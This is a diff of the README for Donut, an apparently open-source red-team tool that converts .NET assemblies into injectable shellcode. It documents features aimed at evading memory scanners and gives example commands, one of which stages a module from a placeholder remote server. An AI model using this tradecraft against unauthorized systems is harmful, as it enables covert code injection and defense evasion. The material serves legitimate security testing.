v0.9.1 changes

README.md

@@ -1,15 +1,17 @@
 # Using Donut
 
 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")                                                                                                               
-Version: 0.9 (Beta) *please submit issues and requests for v1.0 release*
+Version: 0.9.1 (Beta) *please submit issues and requests for v1.0 release*
 
 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
 
 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
 
+Version 0.9.1 "Apple Fritter" Release Blog Post: https://thewover.github.io/Apple-Fritter/
+
 ## Introduction
 
-Donut is a shellcode generation tool that creates x86 or x64 shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
+Donut is a shellcode generation tool that creates position-independant shellcode payloads from .NET Assemblies. This shellcode may be used to inject the Assembly into arbitrary Windows processes. Given an arbitrary .NET Assembly, parameters, and an entry point (such as Program.Main), it produces position-independent shellcode that loads it from memory. The .NET Assembly can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the .NET Assembly is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the Assembly is loaded through the CLR, the original reference is erased from memory to deter memory scanners. The Assembly is loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
 
 It can be used in several ways.
 
@@ -19,20 +21,21 @@ Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Bo
 
 ```
 
- usage: donut [options] -f <.NET assembly> -c <namespace.class> -m <Method>
+usage: donut [options] -f <.NET assembly>
 
        -f <path>            .NET assembly to embed in PIC and DLL.
-       -u <URL>             HTTP server hosting the .NET assembly.
-       -c <namespace.class> The assembly class name.
-       -m <method>          The assembly method name.
-       -p <arg1,arg2...>    Optional parameters for method, separated by comma or semi-colon.
-       -a <arch>            Target architecture : 1=x86, 2=amd64(default).
-       -r <version>         CLR runtime version. v4.0.30319 is used by default.
+       -u <URL>             HTTP server that will host the .NET assembly.
+       -c <namespace.class> Optional class name. (required for DLL)
+       -m <method>          Optional method name. (required for DLL)
+       -p <arg1,arg2...>    Optional parameters or command line, separated by comma or semi-colon.
+       -a <arch>            Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
+       -r <version>         CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
        -d <name>            AppDomain name to create for assembly. Randomly generated by default.
 
  examples:
 
-    donut -a 1 -c TestClass -m RunProcess -p notepad.exe -f loader.dll
+    donut -f assembly.exe
+    donut -a1 -cTestClass -mRunProcess -pnotepad.exe -floader.dll
     donut -f loader.dll -c TestClass -m RunProcess -p notepad.exe -u http://remote_server.com/modules/
 
 ```
@@ -42,6 +45,7 @@ Donut can be used as-is to generate shellcode from arbitrary .NET Assemblies. Bo
 Tags have been provided for each release version of donut that contain the compiled executables. 
 
 * v0.9 Beta: https://github.com/TheWover/donut/releases/tag/v0.9
+* v0.9.1 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.1
 
 However, you may also clone and build the source yourself using the provided makefiles. Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut: